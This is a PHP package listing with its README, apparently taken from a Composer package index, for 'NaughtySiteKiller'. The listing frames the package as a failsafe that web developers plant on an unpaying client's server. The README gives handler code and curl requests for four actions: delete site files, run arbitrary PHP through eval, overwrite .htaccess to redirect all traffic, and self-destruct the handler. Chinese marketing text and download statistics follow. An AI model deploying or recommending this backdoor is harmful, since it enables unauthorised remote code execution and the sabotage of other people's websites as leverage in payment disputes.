peterujah/naughty-site-killer
Composer 安装命令:
composer require peterujah/naughty-site-killer
包简介
NaughtySiteKiller provides a secure method for performing critical operations on a server via HTTP requests. It's designed to protect your work when dealing with naughty clients who, after gaining access to their cPanel, change their passwords and refuse to complete payment.
README 文档
README
We don't like peace, we want problems always.
Naughty Killer Class
Ah, the joy of building a website for a "naughty" client who refuses to pay after getting full access to their cPanel. Don't fret! Instead of chasing them down, just drop the NaughtySiteKiller class on their server as a failsafe. This class lets you send HTTP requests to perform some rather justifiable actions on their website—whether it's deleting files, creating fake templates, or obstructing their site's content. It's the digital equivalent of "you won't pay? Fine, enjoy your broken website.
Key Features:
- Authentication: Validates requests using Bearer or Basic token schemes.
- Token Generation: Generate tokens from a password for authentication purposes.
- Action Handling: Executes actions like
kill(deletes files and self-destructs the script),template(creates template files and updates.htaccess) orexecute(Execute a string as PHP code usingevalfunction). - Security: Ensures that requests are authenticated by comparing the hashed token value.
Installation via Composer:
composer require peterujah/naughty-site-killer
Usage Examples
Simply place the NaughtySiteKiller class on their server as an insurance measure. It supports token-based authentication and various actions like deleting files, creating templates, and updating .htaccess securely.
1. Generating a Hashed Token
To authenticate requests, generate a token by hashing a password using the sha256 algorithm. This token will be used for all incoming HTTP requests.
Example:
$password = 'super_secret_password'; $token = \PeterUjah\NaughtySiteKiller::generateToken($password); // Returns: "Bearer <hashed-password>"
Alternatively, you can directly hash the password:
$password = 'super_secret_password'; echo hash('sha256', $password); // Outputs the hashed token
2. Handling the Incoming Request
Place the NaughtySiteKiller handler on the public directory of the website where it can be accessed through HTTP requests. This handler will process incoming requests, validate the authorization token, check the requested action (kill, execute, template, kill-self), and execute the appropriate method.
Example Usage:
// path/to/public_html/naughty.php <?php use \PeterUjah\NaughtySiteKiller; // Run script without interruptions. NaughtySiteKiller::uninterrupted(); $naughty = new NaughtySiteKiller('<your-secure-bearer-hashed-token-here>'); try { // Optionally pass `__FILE__` if class and handler are not in the same file to also delete the handler file $naughty->run(__FILE__); // Run the script based on incoming HTTP request } catch (Exception $e) { $naughty->response("Unknown error occurred: {$e->getMessage()}", 500); // Handle errors }
Note: Replace
<your-secure-bearer-hashed-token-here>with the hashed token you generated in the previous step.
Payload Fields
The following fields can be included in the payload when sending a request:
$request = [ 'action' => 'kill', // Action to perform: 'kill', 'execute', 'template', or 'kill-self'. 'content' => 'Content for the template, execute (used in both HTML and PHP files when performing kill action, or for template creation).', 'htmlContents'=> 'Content for the template.html file (used when performing kill action).', // HTML content for the template. 'phpContents' => 'Content for the template.php file (used when performing kill action).', // PHP content for the template. 'name' => 'Filename to use when performing template action.', // Custom filename for the template. 'htaccess' => 'Content for the .htaccess file (overwrites existing .htaccess).', ];
Explanation of Fields:
-
action(string): Specifies which action to perform:'kill': Deletes files including self and createsindex.phpandindex.htmlfiles (HTML and PHP).'execute': Execute a string as PHP code usingevalfunction. The instructions should be placed incontents.'template': Creates template file<name>.phpand modifies.htaccessto redirect all website request to<name>.phpif no custom htaccess content is provided.'kill-self': self-destructing, delete the handler file only.
-
content(string): Content to include in the generated template files. Used for both HTML and PHP files during thekillaction, or for thetemplateaction. -
htmlContents(string): Content to be placed in the<template-name>.htmlfile when performing thekillaction. -
phpContents(string): Content to be placed in the<template-name>.phpfile when performing thekillaction. -
name(string): The name of the template file to use when performing thetemplateaction. Default is__template.phpif not specified. -
htaccess(string): The content for the.htaccessfile. This will overwrite any existing.htaccessfile during thetemplateaction. If not provided it will use default to redirect requests to the<template-name>.php.
Payload Requests Examples
Here are examples of how to send payload requests using curl for the different actions (kill, template, and kill-self), including the Bearer token in the header.
1. Kill Action Request (Deletes all files and creates template files)
curl -X POST http://your-server-url/naughty.php \
-H "Authorization: Bearer YOUR_BEARER_TOKEN" \
-H "Content-Type: application/json" \
-d '{
"action": "kill",
"phpContents": "<?php echo \"Hello, World!\"; ?>",
"htmlContents": "<html><body><h1>Hello, World!</h1></body></html>"
}'
2. Execute Action (Run custom code on the server—because we trust you)
The Execute Action allows you to send custom PHP code to be executed on the server. It's like a magic wand for your commands.
curl -X POST http://your-server-url/naughty.php \
-H "Authorization: Bearer YOUR_BEARER_TOKEN" \
-H "Content-Type: application/json" \
-d '{
"action": "execute",
"contents": "return \"Hello, Naughty Client!\";"
}'
Output:
This will execute the PHP code and you will receive the following response:
{
"message": "Execution completed",
"result": "Hello, Naughty Client!"
}
Explanation:
action: Set to"kill"to trigger the kill action.phpContents: Content for thetemplate.phpfile.htmlContents: Content for thetemplate.htmlfile.
3. Template Action Request (Creates template files and updates .htaccess)
curl -X POST http://your-server-url/naughty.php \
-H "Authorization: Bearer YOUR_BEARER_TOKEN" \
-H "Content-Type: application/json" \
-d '{
"action": "template",
"content": "<?php echo \"Welcome to the template!\"; ?>",
"name": "custom_template.php",
"htaccess": "RewriteEngine On\nRewriteRule ^.*$ custom_template.php [L,QSA]"
}'
Explanation:
action: Set to"template"to create a template file and update.htaccess.content: Content for the template (PHP code).name: Custom name for the template file (custom_template.php).htaccess: Custom.htaccesscontent to redirect all requests to the template.
4. Self-Key Action Request (Delete NaughtySiteKiller class and handler)
curl -X POST http://your-server-url/naughty.php \
-H "Authorization: Bearer YOUR_BEARER_TOKEN" \
-H "Content-Type: application/json" \
-d '{
"action": "kill-self"
}'
Explanation:
action: Set to"kill-self", delete the handler file only.
Notes:
- Authorization: Replace
YOUR_BEARER_TOKENwith the actual Bearer token you are using for authentication. - Server URL: Replace
http://your-server-url/naughty.phpwith the actual URL of your script. - Payload: The payload for each action is sent as JSON in the body of the request using the
-dflag withcurl.
Developer Responsibility:
The use of this class is solely the responsibility of the user/developer. The creator and contributors of this class disclaim any responsibility for abuse or damage caused by its misuse. Proper authentication, authorization, and input validation are mandatory to prevent unauthorized access and malicious usage. Any unauthorized use of this class is strictly prohibited and is the responsibility of the user.
peterujah/naughty-site-killer 适用场景与选型建议
peterujah/naughty-site-killer 是一款 基于 PHP 开发的 Composer 扩展包,目前已累计 1 次下载、GitHub Stars 达 1, 最近一次更新时间为 2025 年 01 月 04 日, 在 PHP 生态内属于活跃度较高的组件。
它主要适用于以下技术方向: 「php」 「naughty」 「naughty client」 「web killer」 「site killer」 等业务场景。在实际项目中,围绕这些方向常见需要落地的问题包括:接口对接、性能调优、并发安全、与既有框架(Laravel / ThinkPHP / Yii / Webman 等)的兼容适配,以及生产环境的日志埋点与稳定性保障。
我们在过去多个企业项目中使用过 peterujah/naughty-site-killer 或与其功能相近的方案,如果你在选型或落地过程中遇到问题,例如 版本兼容、二次改造、私有化封装、与内部系统对接、生产 BUG 排查,欢迎联系我们协助评估。
基于 peterujah/naughty-site-killer 在你已有业务上做功能扩展、字段裁剪、UI 适配、与内部账号 / 权限 / 日志系统的深度对接。
线上偶发问题、内存泄漏、慢查询、并发异常等排查修复;针对高流量场景做缓存、队列、索引层面的调优。
承接完整的项目从需求 → 设计 → 开发 → 上线 → 长期运维;也可按月提供技术保姆服务。
与 peterujah/naughty-site-killer 相关的其它包
同方向 / 同关键字的高下载量 PHP Composer 包推荐,方便对比选型:
"Naughty test detector" for PHPUnit. Identifies tests, which don't clean after themselves.
Mock PSR-18 HTTP client
Asynchronous MQTT client built on React
Client for Google Directions API to add interpolated points to a route consisting of given coordinates.
List of naughty words
Symfony validator for naughty strings
统计信息
- 总下载量: 1
- 月度下载量: 0
- 日度下载量: 0
- 收藏数: 1
- 点击次数: 24
- 依赖项目数: 0
- 推荐数: 0
其他信息
- 授权协议: MIT
- 更新时间: 2025-01-04